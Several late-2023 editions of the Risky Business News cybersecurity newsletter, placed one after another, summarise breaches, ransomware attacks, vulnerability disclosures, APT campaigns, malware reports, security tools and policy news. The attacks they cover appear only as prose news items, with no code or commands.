Meta blind to new info-ops: Meta says it's having an increasingly harder time spotting foreign inauthentic coordinated campaigns since US judges have barred US government agencies from interacting with the company. Meta head of security Nathaniel Gleicher says the company has not received any new information from US government agencies since July. Meta's statements come as the company published its quarterly threat report for Q3 2023, which includes information on three major influence operations, two of Chinese origin and one from Russia. [Additional coverage in CyberScoop / Meta report PDF]
Vulnerabilities, security research, and bug bounty
ownCloud vulnerability: GreyNoise has published an analysis of CVE-2023-49103, a recently patched ownCloud vulnerability that is being exploited in the wild. The report concludes that some strict conditions exist for vulnerability to be exploitable in the wild.
Splunk vulnerability: Uptycs has published an analysis of CVE-2023-46214, an RCE in Splunk's SIEM for which a PoC was published this week.
Zyxel security updates: Zyxel has published two waves of security updates this week to fix 15 vulnerabilities across its firewall and NAS products.
LogoFAIL: Binarly researchers have discovered a set of security vulnerabilities in image parsing libraries that are included with BIOS firmware. Named LogoFAIL, the vulnerabilities exploit a feature of BIOS firmware that allows companies to add their logo to a PC's boot-up screen. Binarly says many of these libraries are vulnerable and allow threat actors to upload malformed logo images inside the BIOS and execute malicious code to bypass Secure Boot and take over devices. Binarly says the LogoFAIL vulnerabilities can be exploited on x86 or ARM-based devices from companies like Intel, Acer, and Lenovo. It also impacts UEFI firmware produced by AMI, Insyde, and Phoenix.
Apple zero-days: Apple has patched two WebKit zero-days that were exploited in the wild. The two are tracked as CVE-2023-42916 and CVE-2023-42917. Updates are availble for both iOS and macOS.
Infosec industry
Google cybersecurity training: Google announced a $10 million investment in cybersecurity training programs across Europe. The program will provide universities with a cybersecurity training program and curriculum for their students. Eight universities in eight different European countries will receive funding of up to $1 million to get their cybersecurity courses started. Other universities can also apply. Google launched a center in Malaga, Spain, to coordinate the effort and will be working with the European Cyber Conflict Research Incubator CIC, a UK-based non-profit. Earlier this year, Google also committed more than $20 million to the creation of cybersecurity clinics at 20 higher education institutions across the US.
New tool—AWS Kill Switch: Robinhood security engineer Jeffrey Lyon has open-sourced AWS Kill Switch, a tool that can be used during security incidents to delete or contain other AWS accounts.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about the latest Russian cyber attacks on the Ukrainian energy grid.
This newsletter is brought to you by Corelight. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
A phishing platform specialized in cryptocurrency thefts has shut down operations after stealing more than $71 million over the past nine months.
Named Inferno Drainer, the platform launched in February this year.
Spotted by Web3 security platform ScamSniffer, the service allowed threat actors to create phishing pages for more than 220 cryptocurrency brands.
Threat actors would create phishing pages through the service, they would lure users to the sites, and Inferno Drainer would automate the hacking and draining of victims' crypto wallets. For its troubles, Inferno Drainer would keep 20% of the funds, while its "customers" got the rest.
ScamSniffer researchers say Inferno Drainer was responsible for more than 10,000 phishing sites and helped hackers steal cryptocurrency from more than 103,000 victims since its launch.
The service is the perfect definition of a modern-day cybercrime offering. It was offered, advertised, and managed solely through Telegram; it provided a dumbed-down point-and-click interface for low-skilled threat actors; and pulled the plug on its operations as soon as it had a few big hacks (in August and November this year).
Although the Inferno Drainer administrator is claiming they are shutting down, there is an extremely high chance another wallet-draining service will pop out of the blue in the coming weeks.
Rebranding and name changes are more common tactics in underground cybercrime than they are with Microsoft cloud and security products.
Inferno Drainer is the second crypto-phishing service to shut down this year after Monkey Drainer, which shuttered operations in March.
Ardent ransomware attack: Hospitals owned by Ardent Health are redirecting patients and ambulances to nearby emergency rooms after a ransomware attack crippled the healthcare provider's operations. The incident took place last week, on Thanksgiving Day. Ardent Health says it shut down its IT network to contain the damage. The attack and the resulting IT outage impacted Ardent Health hospitals in Idaho, Oklahoma, New Mexico, Texas, Kansas, and New Jersey—all the states where the company operates. [Additional coverage in in NBC,CNN]
Ethyrial ransomware attack: A ransomware attack that hit gaming company Gellyberry Studios has destroyed user accounts and in-game inventory for the "Ethyrial: Echoes of Yore" game. Because the game was still in an early alpha release and testing phase, only 17,000 user accounts were affected by the incident. The company says it's restoring from a previous backup and will not pay the attackers for a decryption key. It said it learned from the attack and will now back up its servers more often. [Additional coverage in Hot for Security]
Line data breach: The company behind the Line instant messaging service disclosed a security breach [PDF] after a hacker stole the personal data of 440,000 users. LY Corp says the breach originated at one of its subcontractors at the start of October. The company says the hacker infected the computer of one of its subcontractors and then pivoted to its network. More than 300,000 of the 440,000 stolen records are directly related to the Line app. [Additional coverage in Kyodo News]
Aliquippa water utility hack: Officials from Aliquippa, Pennsylvania, have confirmed that an Iranian hacktivist group took control of water booster stations operated by the town's water authority. A group known as Cyber Av3ngers took credit for the hacks last week in a series of Telegram posts. The booster stations were manufactured by Unitronics and were used in Aliquippa to monitor and regulate water pressure. [Additional coverage in CBS]
Taj Hotels breach: The data of 1.5 million customers who stayed at luxury hotel chain Taj Hotels is being sold on an underground forum. [Additional coverage in the India Times]
Pegasus in Serbia:CitizenLab, Amnesty International, and AccessNow came out to support the SHARE Foundation's conclusion from last week that traces of the Pegasus spyware were found on the devices of two members of the Serbian civil society.
"These attacks, which occurred approximately one minute apart from each other on or about August 16, 2023, leveraged the iOS HomeKit iPhone functionality. The tactics are consistent with those previously used by NSO Group's Pegasus spyware, although given limited available forensic indicators on the targeted devices, we cannot confirm the exact type of spyware used in this attack."
DIMC hack: Pro-Ukrainian hacktivist group Cyber Resistance has hacked and leaked data from the Department of Information and Mass Communications of the Russian Ministry of Defense (DIMC). The leaks contain reports compiled by the DIMC showing an obsession of the Russian government about how the Russian Army and the Ukrainian war are covered in both internal and external media. The report also covers KATYUSHA, a platform used by the DIMC to monitor online media. [Additional coverage in InformNapalm]
"We wonder who proofreads all this, because at times the texts look really cringy. It seems that Russian propagandists themselves do not read very closely into what they write. For example, they call their military personnel “military prisoners” [Ed.: “военнопленные” instead of “военнослужащие”]."
General tech and privacy
Google Drive data loss: Google is investigating reports that some Drive users have lost all their recent files as far back as May 2023. Missing files don't appear in the trash folder, in past revisions, or in the web version.[Additional coverage in Android Police]
OpenZFS data corruption bug: Speaking of data corruption, there's a bug in the OpenZFS file storage system that corrupts files when copied.
"OpenZFS through 2.1.13 and 2.2.x through 2.2.1, in certain scenarios involving applications that try to rely on efficient copying of file data, can replace file contents with zero-valued bytes."
Microsoft Defender Application Guard for Office: Microsoft has deprecated the Application Guard for Office. The feature only lasted four years.
Meta complaint in the EU: European privacy watchdog noyb has filed a complaint with the Austrian data protection agency against social media company Meta. Noyb says Meta's new tactic of charging EU users €9.99/month to not track them online is against the EU GDPR. The organization argues that users have a fundamental right to privacy and they shouldn't pay to stop psychopathic tech bros from following their every move online. I may or may not added the "psychopathic tech bros" part.
NAFO and Truth Social:Wired looks at NAFO's trolling and its attempts to sabotage Trump's Truth Social social media platform.
Telegram's fake bans: The same Wired also looks at how inefficient Telegram's channel banning system is and how content shared on those channels often makes its way out and spreads on the platform anyway.
Monzo anti-fraud feature: Something we missed back in September was this new feature added to the Monzo app that shows when a customer support agent is on the phone with a customer. Monzo says this feature can be used to determine when a customer may be getting scammed or when he's actually speaking to a legitimate Monzo customer support agent.
Government, politics, and policy
Ukraine takes credit for Rosaviatsiyahack: The Ukrainian government says it hacked Russian civil aviation agency Rosaviatsiya. Ukraine's Defence Intelligence Main Directorate says it obtained "a large volume of confidential documents" following a "complex special operation in cyberspace." Ukrainian officials claim the stolen documents show the dire state of the Russian aviation sector as a result of Western sanctions. According to screenshots posted by the agency, the most recent document is dated August 2023. Rosaviatsiya disclosed a hack in March 2022, although it's unclear if this is the incident referenced by Ukrainian officials. [h/t Oleg Shakirov]
Ukraine cyber corruption probe: A Ukraine court has ordered the arrest of Viktor Zhora, the ex-deputy head of Ukraine's State Service for Special Communications and Information Protection (SSSCIP). Zhora was fired last week together with former SSSCIP head Yurii Shchyhol. Both are accused of participating in a scheme to contract software at inflated prices. Shchyhol was arrested last week. Both officials are now out on bail. [Additional coverage in The Record]
FISA reform legislation, part 2: After an earlier effort earlier this month through the Government Surveillance Reform Act, we now have a second bill attempting to restore US surveillance powers under Section 702 of the Foreign Intelligence Surveillance Act. This one is spearheaded by Senators Warner, Rubio, Graham, Wicker, Collins, King, Bennet, Casey, Gillibrand, Rounds, Kelly, Klobuchar, Moran, Lankford, and Whitehouse. Compared to the privacy-friendly first act, this one is more lenient and removes an FBI warrant requirement. [Additional coverage in The Record]
ASD Essential Eight update: The Australian Signals Directorate has updated the Essential Eight Maturity Model, a set of eight basic cybersecurity recommendations the agency initially published in 2017. The ASD says the update takes into consideration changes to the threat landscape. The update includes new recommendations such as applying security patches within 48 hours, using PowerShell logging, uninstalling Internet Explorer, and clarifications on the proper way of using MFA. An overview of all the other changes is available here.
AI development guidance: Cybersecurity and government agencies from 18 countries have published joint guidance on how to develop safe and secure AI systems. The guidance targets developers and academics, contains general recommendations, and is non-binding. The document was put together by CISA and the UK NCSC, with input from the agencies listed below.
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Corelight CEO Brian Dye about the value of data from NDR tools when it comes to long-term incident response.
Cybercrime and threat intel
Ransomware gang detained in Ukraine: Ukrainian authorities have detained five members of a cybercrime group that carried out more than 1,800 ransomware attacks across 71 countries. The group's leader and four accomplices were detained following searches at 30 locations across Ukraine. Officials say the group worked as an affiliate for larger ransomware operations and deployed ransomware strains such as LockerGoga, MegaCortex, Hive, and Dharma. The suspects are believed to be connected to a group of 12 suspects detained in June 2021 in connection to the LockerGoga gang. [Press releases: Europol; Eurojust; Ukraine Cyber Police; Ukraine National Police]
SIM swapper sentenced: A US judge has sentenced a 24-year-old from LA to 96 months in prison for SIM-swapping Instagram social media influencers, along with other crimes.
USiSLookups: A Telegram channel named USiSLookups is providing access to US Social Security information for prices ranging from $8 to $40. According to infosec reporter Brian Krebs, the data appears to come from US consumer data broker USinfoSearch, most likely via compromised USinfoSearch accounts.
Malware technical reports
Banking trojans in Iran:Zimperium has more details on a campaign spotted by Sophos that used mobile banking trojans to target Iranian banking users earlier this year. It appears the campaign is still ongoing and evolving.
RisePro: ANY.RUN researchers have published an analysis of RisePro, an infostealer that launched in 2022 as a MaaS.
LostTrust ransomware: ShadowStackRE has published an analysis of LostTrust, a ransomware operation that launched in September this year and quickly became one of the most prolific groups around, making the Top 5 most active groups in October.
Sponsor Section
This week's Risky Business newsletters are brought to you by Corelight. They maintain the open-source Zeek network security sensor/monitor. They also make very good commercial products in the network security space. Check them out at Corelight.com, or watch this video about why you need NDR as well as EDR.
APTs, cyber-espionage, and info-ops
WildCard APT: Intezer researchers have linked the SysJocker, a sophisticated Linux and Windows backdoor, to an APT group they are calling WildCard. Spotted in late 2021 and recently rewritten in Rust, the malware has been linked to a "Hamas-affiliated APT" by fellow Israeli cybersecurity firm Check Point. While Intezer has not made the same attribution, the company did say SysJocker is linked to the current threat landscape surrounding the ongoing Israeli-Hamas war. In an interview, Intezer called the WildCard APT "unusually mature for the Israeli threat landscape."
Andariel:AhnLab says North Korean cyber-espionage group Andariel has jumped on the bandwagon of Apache ActiveMQ exploitation (via CVE-2023-46604). The final payloads are the NukeSped and TigerRat backdoors.
DPRK macOS campaigns:SentinelOne looks at a recent DPRK-linked malware campaign targeting macOS users with the RustBucket and KandyKorn malware strains.
Vulnerabilities, security research, and bug bounty
Chrome zero-day: Google has released security updates for its Chrome browser. The company says that a vulnerability tracked as CVE-2023-6345 is being exploited in the wild.
Ray vulnerabilities: Bishop Fox researchers have discovered a series of vulnerabilities in Ray, an open-source unified compute framework.
Chamilo LMS vulnerabilities: Starlabs researchers have discovered ten vulnerabilities in the Chamilo LMS, including several pre-auth RCEs.
Splunk PoC: A proof-of-concept has been released for CVE-2023-46214, an RCE in Splunk Enterprise that was patched earlier this month.
BLUFFS attack: A team of academics from Europe has published details on BLUFFS, a collection of six attacks against the Bluetooth protocol's future and forward secrecy mechanism. Tracked as CVE-2023-24023, the attacks can force devices paired in a secure connection to use legacy encryption schemes with short and weak encryption keys. This allows attackers to expose Bluetooth devices communicating in the Secure Connections mode to man-in-the-middle (MitM) attacks. The maintainers of the Bluetooth standard have confirmed the BLUFFS attacks and published recommendations for vendors.
ownCloud exploitation: Multiple threat actors are scanning the internet for ownCloud file-sharing servers to exploit a recently patched vulnerability. Tracked as CVE-2023-49103, the security bug has a severity rating of 10/10 and can be used to leak admin passwords and mail server credentials for ownCloud installations. Exploitation has been spotted and independently confirmed by GreyNoise, SANS ISC, and the Shadowserver Foundation. According to the latter, there are more than 11,000 ownCloud servers currently connected to the internet. ownCloud released a security update last week.
Infosec industry
New tool—Have I Been Squatted: Security researcher Juxhin has put together a tool named Have I Been Squatted that checks if a domain is being typosquatted. [h/t Ian Muscat]
New tool—IceKube: Security firm WithSecure has open-sourced a tool named IceKube that can find attack paths within a Kubernetes cluster from a low privileged point to a preferred location, typically cluster-admin.
New tool—CVSS-BT: Security researcher Stephen Shaffer has open-sourced CVSS-BT, a tool to enrich NVD CVSS scores with temporal & threat metrics. [h/t Patrick Garrity]
New tool—DeleFriend: Security firm Hunters has open-sourced a tool named DeleFriend that can perform GCP domain-wide delegation abuse and access Workspace user data via GCP service accounts. Bell's Clément Cruchet has a similar tool out named Delegate.
OpenSSF guide: The Open Source Security Foundation (OpenSSF) has published a guide on how open-source projects can become a CVE numbering authority (CNA).
AT&T to enter MSSP market: US telco giant AT&T will enter the managed security service providers (MSSP) market. The company plans to enter a joint venture with WillJam Ventures and create a standalone MSSP division in the first quarter of 2024.
AWS re:Invent 2023: Live streams from the Amazon re:Invent conference are available on the AWS Events YouTube account.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about the latest Russian cyber attacks on the Ukrainian energy grid.
This newsletter is brought to you by Corelight. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
An ENISA report on NIS compliance spending has found that roughly 42% of the EU's critical infrastructure and digital service provider operators have signed up for cyber insurance in 2022.
The report notes that while cyber insurance coverage was at 43% in 2020 and just 30% in 2021, the cyber insurance market now appears to be active and developed all over the EU.
Last year, organizations in all member states signed up for cyber insurance compared to previous years, where most of the coverage was clustered in just a handful of member states.
The report is based on data from 1,080 OES or DSP organizations across all 27 member states. OES stands for Operators of Essential Services and is the EU's term for critical infrastructure operators, like healthcare, water, energy, transport, and the sort. DSP stands for Digital Service Providers and includes all the large service providers that have more than 50 staff and an annual balance sheet of over €10 million.
Put together by ENISA—the EU's cybersecurity agency—the report looks at how major companies and critical infrastructure operators are investing in complying with the EU's NIS directive. The directive mandates that larger organizations reasonably secure their networks against cyberattacks and report larger cybersecurity incidents to national regulators.
Ever since it passed in 2016, NIS compliance has revolved around companies setting up robust cybersecurity defenses and having the proper tools and systems for dealing with and reporting incidents efficiently.
Even if companies started from scratch or had in-house security teams, NIS compliance has typically come with its own budgeting load.
Since budgets are easier to quantify than other NIS compliance work, ENISA has been surveying the market every year to see how EU organizations have approached the problem.
In 2022, ENISA says that organizations allocated €83.6 million to IT spending on average, of which €5.1 million went to information security spending.
Cybersecurity spending increased by 0.4% from the previous year, suggesting companies have found their sweet spot.
The same trend was also seen in employment figures, with organizations allocating 11.9% of their IT staff to cybersecurity operations, a number down 0.1% from the 12% recorded in 2021.
Around 47% of companies also said they don't have any plans to hire new cybersecurity staff in the next two years, again confirming the market has found its sweet spot in terms of budgeting and staffing.
However, with NIS2 set to replace the old NIS throughout the next two years, cybersecurity is now again a top spending target for EU organizations, and by a very large margin.
Breaches, hacks, and security incidents
Credit union hacks: A hacking group named N4ughtySecTU has hacked and is extorting TransUnion and Experian, two of South Africa's largest consumer credit reporting agencies. The group is asking for $30 million from each, threatening to release its customers' data online. This is the second time the N4ughtysecTU group hacked TransUnion after it deployed ransomware on its network in March 2022. The group is believed to operate out of Brazil. [Additional coverage in TimesLIVE]
CTS cyber-attack: A cyberattack on a shared IT service provider is impacting the activities of more than 80 UK law firms involved with the real estate market. The attack has hit CTS, a Chesire-based company that provides cloud hosting and IT solutions for law firms in the UK and Ireland. The Telegraph reports the company fell victim to the recent wave of CitrixBleed attacks carried out by the LockBit ransomware group. Ever since the attack last Wednesday, some UK law firms have been unable to complete real estate conveyance transactions. [Additional coverage in The Telegraph/non-paywall]
HSE cyber-attack: A cyberattack has hit the IT network of HSE, Slovenia's largest power utility. The company says the incident was the result of a "crypto-virus" that encrypted files and locked staff out of its systems. HSE says it has not received any ransom request and that the incident did not impact activity at any of its power plants. [Additional coverage in STA and 24ur] [h/t Amadej Papež]
Gulf Air data breach: Bahrain-based airline Gulf Air says it suffered a security breach during which an unidentified threat actor might have gained access to customer data. Gulf Air says critical systems and flight operations were not affected by the incident. [Additional coverage in BNA]
New Relic incident: Web tracking and analytics company New Relic is investigating a security breach of its infrastructure. The company did not share any details on the exact nature of the incident. New Relic says it will directly contact each affected customer if their data was impacted by the breach. [h/t Scrantic]
Justin Sun crypto-heists: Two cryptocurrency exchanges linked to blockchain entrepreneur Justin Sun suffered security incidents last week, resulting in an estimated loss of $115 million worth of assets. Hackers stole $85 million from Heco Chain and another $30 million from HTX. This marks the second time HTX got hacked in two months after the platform also lost $8 million in a hack at the end of September. Sun promised to compensate all affected users. [Additional coverage in CNBC]
KyberSwap crypto-heist: A hacker has breached the network of cryptocurrency trading platform KyberSwap and stole $46 million worth of assets. The company confirmed the hack and urged users to withdraw funds from their platform. KyberSwap has offered the hacker the possibility of keeping 10% of the stolen funds as a "bug bounty reward," but five days later, the funds have yet to be returned. This is the company's second hack after it lost $265,000 in September 2022. [Additional coverage in CoinTelegraph]
Government, politics, and policy
EU election cybersecurity exercise: EU agencies held a cybersecurity exercise to test the resilience of election systems. The exercise was meant to prepare EU agencies and officials ahead of EU MP elections that are scheduled to take place in June next year. Participating organizations included the European Parliament's services, ENISA, CERT-EU, and national electoral and cybersecurity authorities.
EU CSA bogged down: Progress on the EU Cyber Solidarity Act has slowed down, and the EU's new cyber legislative effort seems to have gotten bogged down in various commissions. More on the EU CSA is here. [Additional coverage in Euractiv]
IRS getting better at logging: The US IRS is now doing a better job at logging its network, the agency's director of cybersecurity operations, Rick Therrien, said in a webinar earlier this month. [Additional coverage in FederalNewsNetwork]
Russia adds Meta spokesperson to most-wanted list: The Russian government has added Meta spokesperson Andy Stone to the country's most-wanted list. Officials have not revealed why, but an order for his arrest was issued way back in February 2023. The Russian government labeled Meta as a terrorist organization shortly after its invasion of Ukraine after the company refused to censor its content according to the whims of Russian officials. [Additional coverage in the Associated Press]
Sponsor section
In this Risky Business News sponsor interview Tom Uren talks to Brian Dye, CEO of Corelight about the value of data from NDR tools when it comes to longer term incident response.
Cybercrime and threat intel
Nigerian politician connected to Patricia hack: Nigerian police detained a local politician in connection to the May 2023 hack of local cryptocurrency exchange Patricia. Investigators say $750,000 of the stolen funds were sent to the bank account of Wilfred Bonse, a member of Nigeria's Peoples Democratic Party. Patricia says the funds represent a small part of the funds it lost in May. The company has yet to disclose the size of the hack. [Additional coverage in TechPoint Africa]
Apple spyware notifications: Apple has sent a team of security experts to India to help the local authorities investigate recent cases of spyware being found on the iPhones of opposition members. At least eight opposition figures spoke out about security alerts they received from Apple at the end of October. Among them was Rahul Gandhi, leader of the National Congress Party and Modi's main rival for the upcoming elections.
New npm malware: Fifty-eight malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.
Telekopye: ESET has published its second part on Telekopye, a Telegram bot for building phishing pages for various Russian online marketplaces. This part focuses on Neanderthals, the Telekopye admin. See part one for an overview of the service itself here.
PrivateLoader servers: Embee researchers have identified 12 command and control servers for the PrivateLoader malware operation.
MadCat ransomware: A threat actor known as Plessy and WhiteVendor has been linked to a new ransomware strain named MadCat—per the CERT team for Poland's financial sector [PDF].
MEOW: Sticking with the cat-themed extortion groups, we also have MEOW Leaks, a group that's been operating since September this year. It's unclear if they engage in ransomware attacks or classic data extortion. Their latest victim is the Vanderbilt University Medical Center.
Malware technical reports
Parallax RAT: eSentire looks at Parallax RAT, a remote access trojan launched in 2019 and still used in attacks today, primarily via SERP-poisoned pages.
Tellyouthepass ransomware: Chinese security firm Sangfor has published an analysis on the Tellyouthepass ransomware after several Chinese companies got hit over the past weeks.
Sponsor Section
This week's Risky Business newsletters are brought to you by Corelight. They maintain the open source Zeek network security sensor/monitor. They also make very good commercial products in the network security space. Check them out at Corelight.com, or watch this video about why you need NDR as well as EDR.
APTs, cyber-espionage, and info-ops
Chimera's NXP hack: Chinese state-sponsored hackers have breached the network of Dutch chipmaker NXP in an attempt to steal chip designs. The intrusion lasted from October 2017 to the start of 2020 and was carried out by a group known as Chimera. NXP told Dutch newspaper NRC the group managed to steal some intellectual property but did not elaborate. NRC says the group also breached Dutch airline Transavia and seven Taiwanese chipmakers in subsequent operations. [Additional coverage in NRC/non-paywalled]
XDSpy: Russian security firm FACCT says the XDSpy APT group has targeted Russian companies in the metallurgy and military-industrial sectors. XDSpy is an APT discovered in 2020 that has historically targeted Russian organizations only. A past campaign targeted Russian private companies and a well-known research institute.
APT37: South Korean security researcher Sakai has published an analysis of a recent APT37 (Reaper) spear-phishing campaign targeting South Korean organizations.
DoNoT Team: Qihoo 360 looks at a recent campaign carried out by the DoNoT APT group, also known as APT-C-35. The final payload was a mundane, run-of-the-mill Remcos RAT.
Hamas APT op: Check Point analyzes recent versions of the SysJocker multi-platform backdoor, which the company has spotted in some Hamas APT operations linked to the Gaza Cybergang.
"Among the most prominent changes is the shift to Rust language, which indicates the malware code was entirely rewritten while still maintaining similar functionalities. In addition, the threat actor moved to using OneDrive instead of Google Drive to store dynamic C2 (command and control server) URLs."
Syrian Army targeted: Chinese security firm QiAnXin has published a report on a spear-phishing campaign targeting Syrian Army soldiers. The final payload is the SpyMax Android RAT.
Vulnerabilities, security research, and bug bounty
Synology security updates: NAS vendor Synology has patched the bugs used during the Pwn2Own Toronto 2023 hacking contest that took place last month.
ownCloud security updates: File sharing and synchronization solution ownCloud has released threesecurityupdates for its on-premise solution. All vulnerabilities are rated critical with severity scores of 9, 9.8, and 10. The most dangerous of these bugs is a vulnerability that can be used to leak ownCloud admin passwords and mail server credentials via the OwnCloud Graph API.
strongSwan RCE: A remote code execution vulnerability (CVE-2023-41913) has been patched in the strongSwan VPN solution.
Windows micro-patch: Acros Security has released a micro-patch for a new NTLM relay technique disclosed by Check Point earlier this month.
C2PA forgeries: Dr. Neal Krawetz looks at various ways of creating authenticated forgeries for multimedia files secured with C2PA, a multimedia signing and authentication standard developed by Adobe, Arm, Intel, Microsoft, and Truepic.
Infosec industry
New tool—AD Canaries: The Airbus security team has open-sourced AD Canaries, a canary solution for Windows AD environments.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about how being more open about cybersecurity threats is great for marketing and has also forced cybersecurity companies to pick sides and make value judgements.
This newsletter is brought to you by Yubico. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
Internet infrastructure company Fastly will block domain fronting on its cloud platform from February 27, 2024.
Fastly now joins a growing list of major cloud companies that have banned domain fronting. The list includes Amazon (banned in 2018), Google (2018), Microsoft (2022), and Cloudflare (2015).
Domain fronting is a technique to use different domain names on the same HTTPS connection.
The technique became popular in the early 2010s in the mobile app development ecosystem, where developers would configure their apps to connect to a "front" domain that would then forward the connections to the developer's backend. This way, the developer could expand their backend to deal with growing traffic and new features without constantly having to release app updates.
Since then, the technique has expanded and has been adopted by online services like Tor, Telegram, and Signal to bypass internet censorship attempts in oppressive countries. The Tor Project maintains a list of CDN providers and their support for domain fronting, a core feature that allows its users to find and connect to new relays.
Because of its ability to hide backend infrastructure, domain fronting has also become popular with malware operations, being adopted by both financially and espionage-motivated groups.
Fastly began notifying customers about its intention to stop supporting domain fronting at the end of October.
Two weeks later, Microsoft notified Azure customers that it was tightening the screws on its domain fronting 2018 block. Customers who were grandfathered in with the 2018 block will have to make additional changes to their server infrastructure by January 8, 2024.
Back in 2018, when both Amazon and Google blocked domain fronting on their platforms, everyone suspected the Russian government was putting pressure on the two companies. At the time, the Russian government blocked 1.8 million AWS and Google Cloud IP addresses in an attempt to block access to Telegram's instant messenger.
Lower in today's edition of this newsletter, you'll find an entry on how 21 anti-censorship tools maintained by Chinese developers and meant to bypass China's Great Firewalls were removed at the same time from GitHub—all on November 2 and 3.
Prior to that, the Chinese government also ordered that any online account with more than 500,000 followers must share their real name. The government pressured seven of the major Chinese social media platforms to abide by this rule in an attempt to prevent the subversion of its power and influence in cyberspace.
With the proximity of all these announcements, one might wonder if the Chinese government might have applied some pressure. Sadly, we cannot answer this, although things are not as dire as they look.
An academic study published in October this year found that 22 out of 30 tested CDN providers still support/allow domain fronting in some form or another, including major providers like Akamai, CDN77, and Lumen.
Breaches, hacks, and security incidents
Pegasus in Serbia: Traces of the Pegasus spyware have been found on the smartphones of two members of the Serbian civil society. The victims learned of the infection at the end of October after receiving a notification from Apple. The SHARE Foundation says it will not name the victims to protect their identities, but it will work with Access Now and Amnesty International to investigate the hacks.
Fidelity National Financial: Insurance company Fidelity National Financial has shut down some of its IT systems in the aftermath of a major cyberattack. The Florida-based company disclosed the incident a day before the Thanksgiving US holiday, shortly after the intrusion took place. As soon as it was made public, the AlphV ransomware operation took credit for the intrusion. Fidelity National Financial is the largest title insurance company in the US, and the incident is preventing the closure of some real estate transactions. [Additional coverage in RealEstateNews]
Blender DDoS attacks: Some psychopath is DDoSing the website of Blender, an open-source 3D design application. Blender says the attack peaked at over 28Mrps, which is quite the number. I've seen some weird DDoS attacks, but... Blender!?! Really!?!
General tech and privacy
GFW anti-censorship tools are disappearing: At least 21 tools meant to bypass China's Great Firewall and other state censorship tools have been removed from GitHub. All the tools were maintained by Chinese developers and were removed on November 2 and 3, showing some level of coordination either from the developers or from authorities. Western privacy experts believe the Chinese government managed to deanonymize and pressure the developers into removing the tools. The move comes after China is cracking down on internet anonymity. Earlier this month, the Chinese government ordered that any online account with more than 500,000 followers must share their real name. [Additional coverage in TechCrunch]
Twitter misinformation: NewsGuard has published a report detailing how ads from 86 major advertisers appeared next to tweets promoting "some of the most egregious false or misleading claims about the [Israel-Hamas] war."
Firefox 120: Mozilla has released Firefox 120. New features and security fixes are included. The biggest changes in this release are the ability to copy URLs without site tracking parameters and a limited test (in Germany) to automatically block those annoying cookie banners.
Government, politics, and policy
Australian Cyber Security Strategy: The Australian government has published its Cyber Security Strategy for the 2023-2030 period. The plan describes a government-wide effort to improve the country's cybersecurity posture. Major points include the introduction of a no-fault, no-liability ransomware reporting requirement and a possible ban on some ransom payments. It also plans to set up "cyber rapid assistance" teams to help Pacific island nations respond to cyber attacks. The government has allocated AUS$586 million for the strategy's implementation. [Additional coverage in ABC]
New US Navy cyber strategy: On the same topic, but on a much smaller scale, the US Navy has also released its cyber strategy. This is the first time the Navy has put together and released such a document. [Additional coverage in DefenseScoop]
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Derek Hanson, Yubico VP of Solutions Architecture and Alliances, about the state of authentication and what Passkeys are all about.
Cybercrime and threat intel
Killnet leader dox: In a surprising turn of events, a regime-controlled news outlet has doxed and revealed the real-world identity of Killmilk, the leader of the infamous pro-Kremlin hacktivist group Killnet. According to Russian news outlet Gazeta, Killmilk is a 30-year-old named Nikolai Nikolaevich Serafimov. The news outlet says it learned of Killmilk's identity from two Russian hacktivist groups, and they later confirmed the dox with a source in Russian law enforcement. This is quite an interesting turn of events!
RMM abuse: Huntress Labs' Q3 threat report is out, and the company highlights the rise in abuse of legitimate remote monitoring and management (RMM) software by threat actors in post-intrusion activity.
Malware technical reports
ParaSiteSnatcher: Trend Micro looks at ParaSiteSnatcher, a framework used by threat actors to create malicious Chrome extensions to monitor and steal data from user browsers. Trend Micro says the framework has been used in the wild to create Chrome extensions that target Brazilian users.
InfectedSlurs botnet: A new Mirai-based botnet is exploiting two unpatched zero-days to take over smart IoT devices and carry out DDoS attacks. Named InfectedSlurs, the botnet began operating in late 2022, but its activity ramped up in October this year after the addition of the two zero-days. The two zero-days impact router and network video recorder (NVR) models. Security firm Akamai says it won't reveal the vendor and model names until patches are available—in order to prevent additional exploitation.
WSO-NG: Akamai has published a technical write-up of WSO-NG, a pretty common web shell family that's been around for almost 14 years.
Lu0bot: Trend Micro looks at a recent infection with the Lu0bot malware.
IPStorm: Security researcher Ian French has published an analysis of the IPStorm proxy malware, whose botnet was taken down by US officials this year.
DarkGate: Trellix has published a report on the evolution of the DarkGate loader, a malware strain that appears set to replace QakBot in the hearts of most malware operators. A similar report on DarkGate is also available from Sekoia.
WailingCrab: IBM X-Force has published an analysis of WailingCrab, a malware loader strain also known as WikiLoader. The report covers recent malware updates relating to its C2 communication mechanisms, which include support for MQTT connections.
Vidar servers: A Censys scan of the internet has discovered the IP addresses of 22 command and control servers used by the Vidar infostealer.
Atomic Stealer: Malwarebytes is seeing malvertising campaigns push fake browser updates infected with the AMOS, aka Atomic Stealer, a macOS-centric infostealer.
MetaStealer: eSentire researcher RussianPanda has published an analysis of MetaStealer. The infostealer launched in March 2022 and incorporates a lot of code from Redline Stealer, as its creator candidly admitted back then. The malware is different from the MetaStealer that SentinelOne discovered earlier this year, which is written in Go and targets macOS exclusively.
Sponsor Section
Brought to you by Yubico, the inventor of the YubiKey, a security key that provides the gold standard for multi-factor authentication (MFA) and stops account takeovers in their tracks. Find them at yubico.com
APTs, cyber-espionage, and info-ops
HrServ: Kaspersky researchers have discovered a new web shell named HrServ that has been secretly installed on hacked Microsoft Exchange servers across the world. The malware can hide and execute in a server's memory and appears to have been in use since 2021. Kaspersky says the only victim they managed to identify based on its telemetry is a government organization in Afghanistan. The security firm described the malware as sophisticated and believes to be the work of an APT group.
